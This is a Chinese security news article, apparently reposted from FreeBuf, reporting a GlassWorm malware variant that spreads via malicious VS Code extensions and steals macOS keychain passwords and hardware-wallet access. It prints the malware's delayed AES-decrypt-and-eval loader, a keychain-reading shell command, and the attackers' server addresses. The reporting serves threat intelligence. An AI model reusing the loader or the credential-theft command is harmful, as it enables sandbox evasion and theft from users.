2026-01-04 01:46:37 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 自传播恶意软件GlassWorm新变种转向攻击macOS，通过OpenVSX恶意VSCode扩展传播。其利用Solana区块链作为C2架构，结合加密载荷与15分钟延迟技术规避沙箱检测，旨在窃取钥匙串凭证及木马化硬件钱包。建议用户排查可疑扩展并警惕来源不明插件，以防范此类加密货币窃取威胁。 综合评分： 85 文章分类： 恶意软件,威胁情报,应用安全,漏洞分析,终端安全

cover_image

自传播恶意软件GlassWorm利用VS Code扩展攻击macOS用户

FreeBuf

2026年1月2日 18:04 江苏

网络安全研究人员发现GlassWorm恶意软件新变种出现重大策略转变——从Windows系统转向攻击macOS平台。这款自传播蠕虫通过Open VSX市场上的恶意VS Code扩展传播，下载量已突破5万次。

第四代变种引入多项危险特性：加密载荷、硬件钱包木马化功能以及可绕过传统安全扫描工具的沙箱规避技术。自去年10月以来，该威胁组织已展现出极强的适应能力，历经四次迭代升级。

Part01

恶意扩展伪装与区块链C2架构

Open VSX市场上已标记三个可疑扩展：pro-svelte-extension、vsce-prettier-pro和full-access-catppuccin-pro-extension，这些扩展通过共享基础设施和加密密钥相互关联。

该恶意软件采用基于Solana区块链的命令与控制(C2)架构，使得传统封堵手段几乎失效。攻击者通过向区块链发布包含base64编码URL的交易备忘录，维持着无法通过传统域名封锁破坏的去中心化控制。研究人员溯源发现IP地址45.32.151.157在第三代攻击中同样被使用，证实威胁组织的延续性。

Part02

加密载荷与沙箱规避技术

第四代变种引入了精妙的时间延迟机制逃避自动化安全分析。恶意扩展安装后会精确等待15分钟才执行载荷——这个时间差至关重要，因为多数沙箱环境在5分钟后就会超时终止分析，使得恶意软件在自动化扫描期间表现完全正常。

代码中硬编码了9e5毫秒(即15分钟)的延迟值，用于触发AES-256-CBC加密载荷的解密执行：

setTimeout(() =>&nbsp;{const&nbsp;decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);&nbsp;let&nbsp;payload = decrypted.update(encryptedData,&nbsp;'base64',&nbsp;'utf8');payload += decrypted.final('utf8'); &nbsp;&nbsp;eval(payload);},&nbsp;9e5);

加密载荷被嵌入主扩展文件的第64行，使用硬编码密钥和初始化向量进行加密，且三个恶意扩展的加密参数完全一致，证实为同一威胁组织所为。

Part03

macOS定向攻击与硬件钱包威胁

延迟期结束后，恶意软件会从Solana区块链获取当前C2端点并执行接收到的指令。针对macOS的载荷包含：

使用AppleScript实现隐蔽执行
采用LaunchAgents实现持久化（而非Windows注册表）
直接访问macOS钥匙串数据库获取存储的密码凭证：

set&nbsp;keychainPassword to&nbsp;do&nbsp;shell script&nbsp;"security find-generic-password -s 'password_service' -w"

该恶意软件还能将硬件钱包应用（Ledger Live和Trezor Suite）替换为木马版本。虽然2025年12月29日测试期间钱包替换功能尚未完全激活，但相关代码框架已构建完成，只待载荷上传。所有窃取数据会暂存在/tmp/ijewf/目录，经压缩后发送至45.32.150.251/p2p服务器供攻击者提取。

参考来源：

Self-Propagating GlassWorm Weaponizing VS Code Extensions to Attack macOS Users

Self-Propagating GlassWorm Weaponizing VS Code Extensions to Attack macOS Users

#

推荐阅读

#

电台讨论

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：FreeBuf 《自传播恶意软件GlassWorm利用VS Code扩展攻击macOS用户》